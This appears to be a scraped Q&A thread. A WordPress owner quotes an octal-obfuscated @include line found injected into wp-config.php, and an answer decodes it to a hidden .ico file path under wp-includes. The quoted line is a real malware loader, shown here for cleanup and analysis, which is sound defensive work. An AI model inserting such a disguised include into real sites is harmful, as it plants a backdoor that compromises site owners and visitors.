Menu
I've had a strange @include in one of my Wordpress websites in my wp-config file that was actually a calling a malicious script. I cleared the following line of code so I can stop it's execution, but I want to find out where the corrupted file is.
/*9cff9*/
@include "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o";
/*9cff9*/
Can you also tell me how did you find out what the "encoding" is so I can know for the future?
957
asked Dec 05 '25 13:12
It's a mixture of standard letters and octal coded escaped ASCII codes: http://php.net/manual/de/regexp.reference.escape.php
"\057ho\155e/\146ie\154de"
\057 => octal value 57 is char 47 decimal, which is the Forward Slash
ho => ho
\155 => octal 155 = 109 dec, which is a "m"
e => e
etc.
echo "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o"
# /home/fielderd/public_html/wp-includes/Text/Diff/.9d0a56ac.ico
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With